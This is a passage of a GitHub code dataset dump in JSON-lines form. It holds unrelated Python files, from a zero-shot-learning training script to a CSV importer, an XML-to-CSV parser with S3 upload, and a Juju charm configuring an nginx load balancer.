matcontent['trainval_loc'].squeeze() - 1\ntest_seen_loc = matcontent['test_seen_loc'].squeeze() - 1\ntest_unseen_loc = matcontent['test_unseen_loc'].squeeze() - 1\n\natt_name = 'att'\nattribute = matcontent[att_name].T \n\nchkFile = './dataset/finetune/'+args.dataset+'/dvbeExtracted.pkl'\nwith open(chkFile,'rb') as f:\n Feature_target = pickle.load(f)\n\nclsname = [ matcontent['allclasses_names'][i][0][0] for i in range(len(matcontent['allclasses_names']))]\n\ntrain_x = Feature_target['train_seen']['features']\ntrain_label = Feature_target['train_seen']['labels']\ntrain_att = attribute[train_label]\ntrain_id, idx = np.unique(train_label, return_inverse=True)\ntrain_att_unique = attribute[train_id]\n\ntest_x_unseen = Feature_target['test_unseen']['features']\ntest_label_unseen = Feature_target['test_unseen']['labels']\ntest_id, idx = np.unique(test_label_unseen, return_inverse=True)\natt_pro = attribute[test_id]\ntrain_test_id = np.concatenate((train_id, test_id))\n\ntest_x_seen = Feature_target['test_seen']['features'] \ntest_label_seen = Feature_target['test_seen']['labels']\n_, idx = np.unique(test_label_seen, return_inverse=True)\n\natt_dim = train_att.shape[1]\nfeat_dim = train_x.shape[1]\n\natt_pro = torch.from_numpy(att_pro).float().cuda()\ntest_x_seen = torch.from_numpy(test_x_seen).float().cuda()\ntest_x_seen = F.normalize(test_x_seen, p=2, dim=test_x_seen.dim()-1, eps=1e-12)\ntest_x_unseen = torch.from_numpy(test_x_unseen).float().cuda()\ntest_x_unseen = F.normalize(test_x_unseen, p=2, dim=test_x_unseen.dim()-1, eps=1e-12)\ntest_label_seen = torch.tensor(test_label_seen)\ntest_label_unseen = 
torch.tensor(test_label_unseen)\n\natt_all = torch.from_numpy(train_att_unique).float().cuda()\n\nbias = nn.Parameter(torch.FloatTensor(1).fill_(0).cuda(), requires_grad=True)\nscale_cls = nn.Parameter(torch.FloatTensor(1).fill_(10).cuda(), requires_grad=True)\nw1 = Variable(torch.FloatTensor(att_dim, args.hidden_dim).cuda(), requires_grad=True)\nb1 = Variable(torch.FloatTensor(args.hidden_dim).cuda(), requires_grad=True)\nw2 = Variable(torch.FloatTensor(args.hidden_dim, 2048).cuda(), requires_grad=True)\nb2 = Variable(torch.FloatTensor(2048).cuda(), requires_grad=True)\nw_IAS = Variable(torch.FloatTensor(2048, att_dim).cuda(), requires_grad=True)\nb_IAS = Variable(torch.FloatTensor(att_dim).cuda(), requires_grad=True)\n\nw1.data.normal_(0, 0.02)\nw2.data.normal_(0, 0.02)\nb1.data.fill_(0)\nb2.data.fill_(0)\nw_IAS.data.normal_(0,0.02)\nb_IAS.data.fill_(0)\n\noptimizer = torch.optim.Adam([w_IAS,b_IAS,w1, b1, w2, b2, bias, scale_cls], lr=args.lr, weight_decay=args.opt_decay)\n\n# breakpoint()\nstep_size = args.step_size\ngamma = args.gamma\nlr_scheduler = lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=gamma)\ncriterion = nn.CrossEntropyLoss()\n\nways = args.ways\nshots = args.shots\n\ndataset = data_loader_virtualCls(train_x, train_att, train_label, ways=ways, shots=shots)\n\n# breakpoint()\nbest_acc_zsl = 0.0\nbest_acc_gzsl_seen = 0.0\nbest_acc_gzsl_unseen = 0.0\nbest_H = 0.0\nbest_epoch = 0\nbest_unseenAcc = 0.0\n\n\nfor epoch in range(args.num_epochs): \n epoch_loss = 0\n lr_scheduler.step()\n\n for i in range(1000): \n batch_visual, batch_att, batch_label = dataset.__getitem__(i) \n batch_visual = batch_visual.cuda() \n batch_visual_norm = F.normalize(batch_visual, p=2, dim=batch_visual.dim()-1, eps=1e-12) \n\n indx = torch.tensor(list(range(0, ways*shots, shots))) \n unique_batch_att = torch.index_select(batch_att, 0, indx).float().cuda() \n\n batch_weights = forward(unique_batch_att,batch_visual_norm,tmp=TMP) \n all_cls_weights = batch_weights\n\n score = apply_classification_weights(batch_visual_norm, all_cls_weights)\n score = score.squeeze(0) \n loss = criterion(score, Variable(batch_label.cuda()))\n\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_([w_IAS,b_IAS,w1, b1, w2, b2, scale_cls, bias], 1)\n optimizer.step()\n epoch_loss = epoch_loss + loss\n\n epoch_loss = epoch_loss / 1000.0\n epoch_loss = epoch_loss.data.cpu().numpy()\n\n acc_zsl, seenAcc, acc_unseen_gzsl, acc_seen_gzsl, H, Rs,Ru,accs_cls,generalAccs_cls,unseenCos_cls,seenCos_cls,unseenpred_cls = compute_accuracy_all(att_pro, att_all, test_x_unseen, \n test_id, test_label_unseen, test_x_seen, train_test_id, test_label_seen, train_id)\n \n H = 2 * acc_seen_gzsl * acc_unseen_gzsl / (acc_seen_gzsl + acc_unseen_gzsl)\n writer.add_scalar('general/acc_seen_gzsl',acc_seen_gzsl,epoch)\n writer.add_scalar('general/acc_unseen_gzsl',acc_unseen_gzsl,epoch)\n writer.add_scalar('general/H',H,epoch)\n writer.add_scalar('split/unseenAcc',acc_zsl,epoch)\n writer.add_scalar('split/seenAcc',seenAcc,epoch)\n writer.add_scalar('split/Rs',Rs,epoch)\n writer.add_scalar('split/Ru',Ru,epoch)\n writer.add_scalar('loss/loss',epoch_loss,epoch)\n \n\n if acc_zsl > best_unseenAcc:\n print('save best acc')\n best_unseenAcc = acc_zsl\n best_epoch = epoch\n best_acc_zsl = acc_zsl \n best_seen_acc = seenAcc \n best_acc_gzsl_seen = acc_seen_gzsl\n best_acc_gzsl_unseen = acc_unseen_gzsl\n best_H = H\n best_Ru = Ru\n best_Rs = Rs\n\n best_w1 = w1.data.clone()\n best_b1 = b1.data.clone()\n best_w2 = w2.data.clone()\n 
best_b2 = b2.data.clone()\n best_scale_cls = scale_cls.data.clone()\n best_bias = bias.data.clone()\n\n torch.save({'w1': best_w1, 'b1': best_b1, 'w2': best_w2, 'b2': best_b2, \n 'scale_cls': best_scale_cls, 'bias': best_bias,'w_IAS':w_IAS,'b_IAS':b_IAS}, model_file_name.replace('.pt','bestunseenAcc.pt'))\n \n\n for param_group in optimizer.param_groups:\n print('ep: %d, lr: %lf, loss: %.4f, zsl: %.4f, seenAcc: %.4f gzsl: seen=%.4f, unseen=%.4f, h=%.4f, Rs=%.4f, Ru=%.4f ' % \n (epoch, param_group['lr'], epoch_loss, acc_zsl, seenAcc, acc_seen_gzsl, acc_unseen_gzsl, H, Rs, Ru,)) \nprint(model_file_name)\nprint('best_ep: %d, zsl: %.4f, seenAcc: %.4f gzsl: seen=%.4f, unseen=%.4f, h=%.4f, Rs=%.4f, Ru=%.4f' % \n (best_epoch, best_acc_zsl,best_seen_acc, best_acc_gzsl_seen, best_acc_gzsl_unseen, best_H, best_Rs, best_Ru)) \n\n","repo_name":"anonmous529/AGZSL","sub_path":"train_unseen.py","file_name":"train_unseen.py","file_ext":"py","file_size_in_byte":12959,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"54"} +{"seq_id":"15347637747","text":"import csv\n\nwith open('elements.csv', 'rb') as csvfile:\n\telementReader = csv.reader(csvfile, delimiter=',')\n\theader = elementReader.next()\n\tsassString = \"$elements: (\\n\"\n\tfor row in elementReader:\n\t\tsassString += '\\t' + row[0].rstrip().lstrip()+' : (\\n'\n\t\tindex = 1\n\t\tfor datum in row[1:-1]:\n\t\t\tsassString += '\\t\\t' + header[index] + ' : \\'' + datum.lstrip().rstrip() + '\\',\\n'\n\t\t\tindex += 1\n\t\tif len(row[-1]) < 6:\n\t\t\trow[-1] = '00'+row[-1]\n\t\trow[-1] = row[-1].replace('+', '')\n\t\tsassString = sassString + '\\t\\t' + header[-1] + ' : #' + row[-1] + '\\n\\t),\\n'\n\tsassString = sassString[:-2] + '\\n);'\n\twith open('source/scss/_elements.scss', 'wb') as f:\n\t\tf.write(sassString)\n","repo_name":"ahadik/elemental","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37404938283","text":"from django.http import Http404\nfrom django.shortcuts import render, redirect\n\n#import enchant\nimport re\nfrom migrations.models import PhoneForm\n\n# D = enchant.Dict(\"en-US\")\n\n\ndef algorithm(a, b, c):\n s1, s = 0, 0\n a1 = list(PhoneForm.objects.values_list('email', flat=True))\n if len(a) > 7:\n if re.match(r'\\b[\\w\\.-]+@[\\w\\.-]+\\.\\w{2,4}\\b', a):\n s = s + 1\n else:\n s = s + 0\n\n for item in a1:\n if a == item:\n s1 = s1 + 1\n else:\n s1 = s1 + 0\n if s1 > 2:\n return False\n else:\n e = list(PhoneForm.objects.filter(email=item).values_list('subjects', flat=True))\n for itm in e:\n if b == itm:\n return False\n else:\n f = list(PhoneForm.objects.filter(email=item).values_list('messages', flat=True))\n for itm1 in f:\n if c == itm1:\n return False\n else:\n s = s + 1\n\n list1 = b.split(' ')\n l1 = len(list1)\n ln1 = 0\n for r in list1:\n if D.check(r) == True:\n ln1 = ln1 + 1\n else:\n ln1 = ln1 + 0\n if l1 == ln1:\n s = s + 1\n else:\n s = s + 0\n\n list2 = c.split(' ')\n l2 = len(list2)\n ln2 = 0\n for n in list2:\n if D.check(n) == True:\n ln2 = ln2 + 1\n else:\n ln2 = ln2 + 0\n if l2 == ln2:\n s = s + 1\n else:\n s = s + 0\n\n if s == 4:\n return True\n else:\n return False\n\n\ndef c_form(request):\n if request.method == 'GET':\n template = 'phone.html'\n x = PhoneForm.objects.all()\n data = {'phone_list': x}\n return render(request, template, data)\n\n elif request.method == 'POST':\n email = 
request.POST['email']\n subjects = request.POST['subjects']\n messages = request.POST['messages']\n if algorithm(email, subjects, messages):\n x = PhoneForm(email=email, subjects=subjects, messages=messages)\n x.save()\n return redirect('c_form')\n else:\n return redirect('c_form')\n\n\ndef c_form_delete(request, phone_id):\n try:\n x = PhoneForm.objects.get(id=phone_id)\n except PhoneForm.DoesNotExsist:\n return Http404\n else:\n x.delete()\n return redirect('c_form')\n","repo_name":"SRI-VISHVA/scam","sub_path":"scam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13714172845","text":"def newton(f, df, x0, max_it=20, tol=1e-3):\n iter = 0\n\n # Check if the initial guess is very close to a root\n if abs(f(x0)) < tol:\n return x0, True, iter\n\n # Continue iterating until the maximum number of iterations is reached\n while iter < max_it:\n f0 = f(x0)\n dfdx0 = df(x0)\n\n if abs(f0) < tol:\n # Convergence achieved\n return x0, True, iter\n\n if abs(dfdx0) < tol:\n # Newton's method fails to converge due to zero derivative\n raise RuntimeError(\"Newton's method failed to converge.\")\n\n x1 = x0 - f0 / dfdx0 # Compute the next guess for the root\n if abs(x1 - x0) < tol:\n # Convergence achieved\n return x1, True, iter\n\n x0 = x1 # Update the current guess\n iter += 1 # Increment the iteration counter\n\n return x0, False, iter\n\n\ndef bisection(f, a, b, max_iter=1000, tol=1e-3):\n # Check if the function has no roots or more than one root in the given interval\n if f(a) * f(b) > 0:\n print(f'No roots or more than one root in [{a}, {b}]')\n return None\n\n # Initialize the midpoint of the interval\n m = (a + b) / 2\n\n # Perform the bisection method until the desired tolerance or maximum number of iterations is reached\n iterations = 0\n while abs(f(m)) > tol:\n # Break the loop if the method does not converge within max_iter iterations\n if iterations >= max_iter:\n print(f\"The method did not converge after {max_iter} iterations.\")\n return None\n\n # Check which half of the interval to update based on the sign of f(a)*f(m)\n if f(a) * f(m) < 0: # If 'a' and 'm' bracket a root, update 'b' to 'm'\n b = m\n elif f(b) * f(m) < 0: # If 'b' and 'm' bracket a root, update 'a' to 'm'\n a = m\n\n # Compute the new midpoint\n m = (a + b) / 2\n iterations += 1\n\n # Return the approximate root\n return m","repo_name":"pineapple-bois/polynomial-methods","sub_path":"py_files/root_finding.py","file_name":"root_finding.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19052910999","text":"from pyramid.config import Configurator\n\n\ndef main(global_config, **settings):\n config = Configurator(settings=settings)\n\n # Jinja2\n config.include('pyramid_jinja2')\n config.add_jinja2_search_path('templates/')\n\n # Static files\n config.add_static_view(name='cache', path='cache')\n config.add_static_view(name='node_modules', path='../node_modules')\n\n # Routes\n config.add_route('home', '/')\n\n # Views\n config.scan()\n\n return config.make_wsgi_app()\n","repo_name":"netbek/piper","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1809125986","text":"import re\nwords = sorted(input().split(), key=len)\nword = 
words[0]\nlength = len(word)\n\nfor i in range(length, 0, -1):\n substrings = set(word[j:j + i] for j in range(0, 1 + length - i))\n ok = sorted(list(filter(lambda ss: all(map(lambda w: ss in w, words[1:])), substrings)))\n if ok: break\n\nprint(ok[0])\n","repo_name":"rabestro/sololearn-challenges","sub_path":"medium/pro-longest-common-substring/LongestCommonSubstring.py","file_name":"LongestCommonSubstring.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"73519625762","text":"\"\"\"classe pour importer des fichiers CSV\nstructurés :\n\"Apolinne\"\n\"Linh-Da\"\n\"Mathieu\"\n\"Mathis\"\n\"Oussama\"\n\"\"\"\n\nimport csv\nfrom importation_objects.abstract_importation_liste import AbstractImportationListe\n\nclass ImportationCsv(AbstractImportationListe):\n \"\"\"permet d'importer des Csv (au format simpliste: pas\n de titre, mots mis ligne à ligne entre '\"')\n\n Parameters\n ----------\n Example\n -------\n \"\"\"\n #pylint: disable=too-few-public-methods\n #pylint: disable=super-init-not-called\n def __init__(self):\n \"\"\"_summary_\n\n Parameters\n ----------\n fichier : str\n nom du fichier avec l'extension .csv\n dossier : str\n chemin du dossier\n encodage : str, optional\n encodage du fichier, by default ' utf-8'\n\n Example\n -------\n >>> import json\n >>> from importation_objects.abstract_importation_liste import AbstractImportationListe\n >>> ma_liste = ImportationCsv()\n >>> isinstance(ma_liste, ImportationCsv)\n True\n \"\"\"\n\n #pylint: disable=arguments-differ\n def creer(self, fichier : str, dossier : str,\n encodage: str = ' utf-8', separateur : str = ','):\n \"\"\"retourne une liste de mos à partir d'un fichier CSV\n\n Parameters\n ----------\n fichier : str\n nom du fichier\n dossier : str\n nom du dossier\n encodage : str, optional\n encodage, by default ' utf-8'\n separateur : str, optional\n séparateur, by default ','\n\n Returns\n -------\n liste_mots : list[str]\n\n Examples\n --------\n >>> import csv\n >>> from importation_objects.abstract_importation_liste import AbstractImportationListe\n >>> ma_liste = ImportationCsv()\n >>> chemin = \"C:/Users/mathi/Documents/Ensai/2A/S1/Projet informatique\"\n >>> res = ma_liste.creer(\"listeformatCSV.csv\", chemin)\n >>> print(res)\n ['Apolinne', 'Mathis', 'Mathieu', 'Linh-da', 'Oussama']\n >>> ma_liste2 = ImportationCsv()\n >>> chemin = \"mauvais_chemin\"\n >>> res = ma_liste.creer(\"listeformatCSV.csv\", chemin)\n Le lien donné est invalide.\n \"\"\"\n liste_res = []\n\n try:\n with open(f'{dossier}/{fichier}','r', newline='', encoding= encodage) as csvfile:\n reader = csv.reader(csvfile, delimiter= separateur)\n for row in reader:\n liste_res.append(row[0])\n return liste_res\n except FileNotFoundError:\n print('Le lien donné est invalide.')\n return None\n\nif __name__==\"__main__\":\n import doctest\n doctest.testmod(verbose=True)\n","repo_name":"apollineguerineau/client_kata","sub_path":"importation_objects/importation_csv.py","file_name":"importation_csv.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17278283028","text":"class Item:\r\n def __init__(self, nome, telefone):\r\n self.dado = {'nome': nome, 'telefone': telefone}\r\n self.proximo = None\r\n self.anterior = None\r\n\r\nclass Lista:\r\n def __init__(self):\r\n self.cabeca = None\r\n self.calda = None\r\n self.tamanho = 0\r\n\r\n def 
is_empty(self):\r\n return self.cabeca is None\r\n\r\n def inserirInicio(self, nome, telefone):\r\n novo_item = Item(nome, telefone)\r\n if self.is_empty():\r\n self.cabeca = novo_item\r\n self.calda = novo_item\r\n else:\r\n novo_item.proximo = self.cabeca\r\n self.cabeca.anterior = novo_item\r\n self.cabeca = novo_item\r\n self.tamanho += 1\r\n\r\n def inserirFim(self, nome, telefone):\r\n novo_item = Item(nome, telefone)\r\n if self.is_empty():\r\n self.cabeca = novo_item\r\n self.calda = novo_item\r\n else:\r\n novo_item.anterior = self.calda\r\n self.calda.proximo = novo_item\r\n self.calda = novo_item\r\n self.tamanho += 1\r\n\r\n def remover(self):\r\n if self.is_empty():\r\n print('A lista está vazia')\r\n else:\r\n nome = input('Digite o nome da pessoa a ser removida: ')\r\n atual = self.cabeca\r\n while atual is not None:\r\n if atual.dado['nome'] == nome:\r\n if atual.anterior is not None:\r\n atual.anterior.proximo = atual.proximo\r\n else:\r\n self.cabeca = atual.proximo\r\n\r\n if atual.proximo is not None:\r\n atual.proximo.anterior = atual.anterior\r\n else:\r\n self.calda = atual.anterior\r\n\r\n self.tamanho -= 1\r\n print('Pessoa removida com sucesso.')\r\n return\r\n\r\n atual = atual.proximo\r\n\r\n print(f'O nome \"{nome}\" não foi encontrado na agenda')\r\n\r\n def buscar(self):\r\n if self.is_empty():\r\n print('A lista está vazia')\r\n else:\r\n nome = input('Digite o nome da pessoa a ser buscada: ')\r\n atual = self.cabeca\r\n while atual is not None:\r\n if atual.dado['nome'] == nome:\r\n print(f'Nome: {atual.dado[\"nome\"]}, Telefone: {atual.dado[\"telefone\"]}')\r\n return\r\n\r\n atual = atual.proximo\r\n\r\n print(f'O nome \"{nome}\" não foi encontrado na agenda')\r\n\r\n def mostrar(self):\r\n if self.is_empty():\r\n print('A lista está vazia')\r\n else:\r\n atual = self.cabeca\r\n while atual is not None:\r\n print(f'Nome: {atual.dado[\"nome\"]}, Telefone: {atual.dado[\"telefone\"]}')\r\n atual = atual.proximo\r\n\r\n\r\ndef menu(opcao):\r\n lista = Lista()\r\n\r\n if opcao == 1:\r\n for _ in range(3):\r\n nome = input('Nome: ')\r\n numTel = input('Número de Telefone: ')\r\n lista.inserirInicio(nome, numTel)\r\n print('Dados inseridos com sucesso!')\r\n\r\n elif opcao == 2:\r\n lista.remover()\r\n\r\n elif opcao == 3:\r\n lista.buscar()\r\n\r\n elif opcao == 4:\r\n lista.mostrar()\r\n\r\nwhile True:\r\n print('Escolha uma função digitando o número referente')\r\n\r\n print('1 - Inserir')\r\n print('2 - Remover')\r\n print('3 - Buscar')\r\n print('4 - Mostrar Agenda')\r\n print('5 - Sair')\r\n\r\n opcao = int(input('Digite um número referente a uma função: '))\r\n\r\n if opcao == 5:\r\n print('Você saiu!')\r\n break\r\n\r\n menu(opcao)\r\n","repo_name":"ferreirabatistamariaeduarda/N1---Lista-4---Fila-e-Lista","sub_path":"Questao 12.py","file_name":"Questao 12.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44452558119","text":"import xml.etree.ElementTree as ET\nimport csv\nimport boto3\nimport logging\nfrom botocore.exceptions import ClientError\nfrom datetime import datetime\nfrom timeit import default_timer as timer\n\n\n# Creating Logger file\nlogger_file = \"./logs/\"+datetime.now().date().strftime(\"%Y_%m_%d\")+\".log\"\nlogging.basicConfig(filename=logger_file, filemode='w',\n format='%(name)s - %(levelname)s : %(message)s',\n level=logging.DEBUG)\nlogger = logging.getLogger('LargeXmlParser')\n\n\nXML_FILE = 
'./xml_files/DLTINS_20210117_01of01.xml'\n# XML_FILE = './test_files/test_1.xml'\nCSV_EXPORT_FILENAME = './csv/xml_csv'\nAWS_STORAGE_BUCKET_NAME = \"st-data-lake\"\nFIELDS = [\n 'FinInstrmGnlAttrbts.Id',\n 'FinInstrmGnlAttrbts.FullNm',\n 'FinInstrmGnlAttrbts.ClssfctnTp',\n 'FinInstrmGnlAttrbts.CmmdtyDerivInd',\n 'FinInstrmGnlAttrbts.NtnlCcy',\n 'Issr'\n ]\n\n\nclass LargeXmlParser:\n\n \"\"\"\n LargeXmlParser parses xml file in parse_xml() and sends a\n list of dictionaries with parsed values\n to write_to_csv() for creating the final csv file.\n And final upload_file sends the csv file to a s3 bucket.\n \"\"\"\n\n def __init__(self, csv_filename, xml_file):\n \"\"\" Data Members initialisation \"\"\"\n logger.info(\"Intialising Data Members\")\n self.csv_filename = csv_filename\n self.xml_file = xml_file\n\n def parse_xml(self):\n \"\"\"\n Function to parse large xml iteratively\n looking at start and end events in the xml.\n\n :return: None\n \"\"\"\n # Generate csv header\n with open(self.csv_filename, 'a') as csvfile:\n # creating a csv dict writer object\n writer = csv.DictWriter(csvfile, fieldnames=FIELDS)\n # writing headers (field names)\n writer.writeheader()\n csvfile.close()\n\n logger.info('Starting XML Parsing...')\n try:\n # Get an iterable.\n context = ET.iterparse(self.xml_file, events=(\"start\", \"end\"))\n elements_parsed = 0\n row_count = 0\n\n for index, (event, elem) in enumerate(context):\n\n con_data = []\n row_dict = {}\n if index == 0:\n root = elem\n\n if event == \"end\" and \"TermntdRcrd\" in elem.tag:\n index = elem.tag.index('TermntdRcrd')\n attrib = elem.tag[:index]\n tag = elem.tag[index:]\n issr_elem = elem.find(attrib+\"Issr\")\n row_dict[\"Issr\"] = issr_elem.text\n for it in elem.iter(attrib+'FinInstrmGnlAttrbts'):\n fin_attr = it.find(attrib+\"Id\")\n row_dict[\"FinInstrmGnlAttrbts.Id\"] = fin_attr.text.encode('utf-8')\n logger.info('Record Id: {}'.format(fin_attr.text.encode('utf-8')))\n fin_attr = it.find(attrib+\"FullNm\")\n row_dict[\"FinInstrmGnlAttrbts.FullNm\"] = fin_attr.text.encode('utf-8')\n fin_attr = it.find(attrib+\"ClssfctnTp\")\n row_dict[\"FinInstrmGnlAttrbts.ClssfctnTp\"] = fin_attr.text.encode('utf-8')\n fin_attr = it.find(attrib+\"CmmdtyDerivInd\")\n row_dict[\"FinInstrmGnlAttrbts.CmmdtyDerivInd\"] = fin_attr.text.encode('utf-8')\n fin_attr = it.find(attrib+\"NtnlCcy\")\n row_dict[\"FinInstrmGnlAttrbts.NtnlCcy\"] = fin_attr.text.encode('utf-8')\n con_data.append(row_dict)\n sample_dict = row_dict\n root.clear()\n if len(row_dict) == 6:\n logger.info(\"Writing row into CSV..\")\n wrote_dict = self.write_to_csv(con_data)\n if wrote_dict is True:\n row_count = row_count + 1\n else:\n raise ValueError('Data dict is empty!')\n con_data = []\n elements_parsed = elements_parsed + 1\n except Exception as e:\n logger.error('Error occured during parsing XML due to : {}'.format(e))\n raise e\n return elements_parsed, row_count, sample_dict\n\n def write_to_csv(self, parsed_values):\n \"\"\"\n Function to parsed xml values into csv.\n\n :param parsed_values: list of dictionaries to write to csv file\n :return: None\n \"\"\"\n\n logger.info('Started writing into CSV file...')\n # writing to csv file\n try:\n if len(parsed_values) == 0:\n return False\n with open(self.csv_filename, 'a') as csvfile:\n\n # creating a csv dict writer object\n writer = csv.DictWriter(csvfile, fieldnames=FIELDS)\n\n # writing data rows\n writer.writerows(parsed_values)\n\n logger.info(\"Successfully inserted row into csv..\")\n csvfile.close()\n except Exception as 
e:\n logger.error('Could not write to csv file : {}'.format(e))\n raise e\n return True\n\n def upload_file_to_s3(self, csv_file_name, bucket, object_name=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param object_name: S3 object name. If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n s3 = boto3.resource('s3')\n if object_name is None:\n object_name = csv_file_name\n\n try:\n s3.meta.client.upload_file(csv_file_name, AWS_STORAGE_BUCKET_NAME, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\n\nif __name__ == '__main__':\n\n # Tracking start time\n start = timer()\n print(\"Start processing XML---->\")\n logger.info('###########################################################################################')\n logger.info(' Creating CSV Export file name')\n logger.info('###########################################################################################')\n csv_filename = CSV_EXPORT_FILENAME+\"_\"+datetime.now().date().strftime(\"%Y_%m_%d\")+\".csv\"\n logger.info('CSV Filename: \"{}\"'.format(csv_filename))\n logger.info('___________________________________________________________________________________________')\n\n logger.info('###########################################################################################')\n logger.info(' Parsing Large XML File')\n logger.info('###########################################################################################')\n parser = LargeXmlParser(csv_filename, XML_FILE)\n elements_parsed, row_count, row_dic_sample = parser.parse_xml()\n print('Elements Parsed: {}'.format(elements_parsed))\n print('Rows created in CSV : {}'.format(row_count))\n print('Sample Row Dict: {}'.format(row_dic_sample))\n logger.info('___________________________________________________________________________________________')\n\n end = timer()\n logger.info('################################## Process Summary #########################################################')\n logger.info(' Total Number of XML blocks parsed: {}'.format(elements_parsed))\n logger.info(' Total Number of Rows created in CSV : {}'.format(row_count))\n logger.info(' Sample parsed dict: {}'.format(row_dic_sample))\n logger.info(' Finished!! Time Taken: {}sec'.format(end - start))\n logger.info('############################################################################################################')\n print(\"Created CSV---->\")\n print('Finished!! 
Time Taken: {}sec'.format(end - start))\n\n logger.info('###########################################################################################')\n logger.info(' Sending CSV to AWS s3')\n logger.info('###########################################################################################')\n logger.info(' This functionaly is currently commented off')\n # parser.upload_file_to_s3(str(csv_filename), AWS_STORAGE_BUCKET_NAME)\n logger.info('___________________________________________________________________________________________')\n","repo_name":"ScreamSama/large_xml_parser","sub_path":"large_xml_parser.py","file_name":"large_xml_parser.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73644363043","text":"import os\nimport socket\nimport subprocess\n\nfrom charms import layer\nfrom charms.reactive import when, when_any, when_not\nfrom charms.reactive import set_state, remove_state\nfrom charmhelpers.core import hookenv\nfrom charmhelpers.contrib.charmsupport import nrpe\n\nfrom charms.layer import nginx\n\nfrom subprocess import Popen\nfrom subprocess import PIPE\nfrom subprocess import STDOUT\n\n\n@when('certificates.available')\ndef request_server_certificates(tls):\n '''Send the data that is required to create a server certificate for\n this server.'''\n # Use the public ip of this unit as the Common Name for the certificate.\n common_name = hookenv.unit_public_ip()\n # Create SANs that the tls layer will add to the server cert.\n sans = [\n hookenv.unit_public_ip(),\n hookenv.unit_private_ip(),\n socket.gethostname(),\n ]\n # Create a path safe name by removing path characters from the unit name.\n certificate_name = hookenv.local_unit().replace('/', '_')\n # Request a server cert with this information.\n tls.request_server_cert(common_name, sans, certificate_name)\n\n\n@when('nginx.available', 'apiserver.available',\n 'certificates.server.cert.available')\ndef install_load_balancer(apiserver, tls):\n ''' Create the default vhost template for load balancing '''\n # Get the tls paths from the layer data.\n layer_options = layer.options('tls-client')\n server_cert_path = layer_options.get('server_certificate_path')\n cert_exists = server_cert_path and os.path.isfile(server_cert_path)\n server_key_path = layer_options.get('server_key_path')\n key_exists = server_key_path and os.path.isfile(server_key_path)\n # Do both the the key and certificate exist?\n if cert_exists and key_exists:\n # At this point the cert and key exist, and they are owned by root.\n chown = ['chown', 'www-data:www-data', server_cert_path]\n # Change the owner to www-data so the nginx process can read the cert.\n subprocess.call(chown)\n chown = ['chown', 'www-data:www-data', server_key_path]\n # Change the owner to www-data so the nginx process can read the key.\n subprocess.call(chown)\n\n hookenv.open_port(hookenv.config('port'))\n services = apiserver.services()\n nginx.configure_site(\n 'apilb',\n 'apilb.conf',\n server_name='_',\n services=services,\n port=hookenv.config('port'),\n server_certificate=server_cert_path,\n server_key=server_key_path,\n )\n hookenv.status_set('active', 'Loadbalancer ready.')\n\n\n@when('nginx.available')\ndef set_nginx_version():\n ''' Surface the currently deployed version of nginx to Juju '''\n cmd = 'nginx -v'\n p = Popen(cmd, shell=True,\n stdin=PIPE,\n stdout=PIPE,\n stderr=STDOUT,\n close_fds=True)\n raw = p.stdout.read()\n # The version comes back as:\n # nginx 
version: nginx/1.10.0 (Ubuntu)\n version = raw.split(b'/')[-1].split(b' ')[0]\n hookenv.application_version_set(version.rstrip())\n\n\n@when('website.available')\ndef provide_application_details(website):\n ''' re-use the nginx layer website relation to relay the hostname/port\n to any consuming kubernetes-workers, or other units that require the\n kubernetes API '''\n website.configure(port=hookenv.config('port'))\n\n\n@when('loadbalancer.available')\ndef provide_loadbalancing(loadbalancer):\n '''Send the public address and port to the public-address interface, so\n the subordinates can get the public address of this loadbalancer.'''\n loadbalancer.set_address_port(hookenv.unit_get('public-address'),\n hookenv.config('port'))\n\n\n@when('nrpe-external-master.available')\n@when_not('nrpe-external-master.initial-config')\ndef initial_nrpe_config(nagios=None):\n set_state('nrpe-external-master.initial-config')\n update_nrpe_config(nagios)\n\n\n@when('nginx.available')\n@when('nrpe-external-master.available')\n@when_any('config.changed.nagios_context',\n 'config.changed.nagios_servicegroups')\ndef update_nrpe_config(unused=None):\n services = ('nginx',)\n\n hostname = nrpe.get_nagios_hostname()\n current_unit = nrpe.get_nagios_unit_name()\n nrpe_setup = nrpe.NRPE(hostname=hostname)\n nrpe.add_init_service_checks(nrpe_setup, services, current_unit)\n nrpe_setup.write()\n\n\n@when_not('nrpe-external-master.available')\n@when('nrpe-external-master.initial-config')\ndef remove_nrpe_config(nagios=None):\n remove_state('nrpe-external-master.initial-config')\n\n # List of systemd services for which the checks will be removed\n services = ('nginx',)\n\n # The current nrpe-external-master interface doesn't handle a lot of logic,\n # use the charm-helpers code for now.\n hostname = nrpe.get_nagios_hostname()\n nrpe_setup = nrpe.NRPE(hostname=hostname)\n\n for service in services:\n 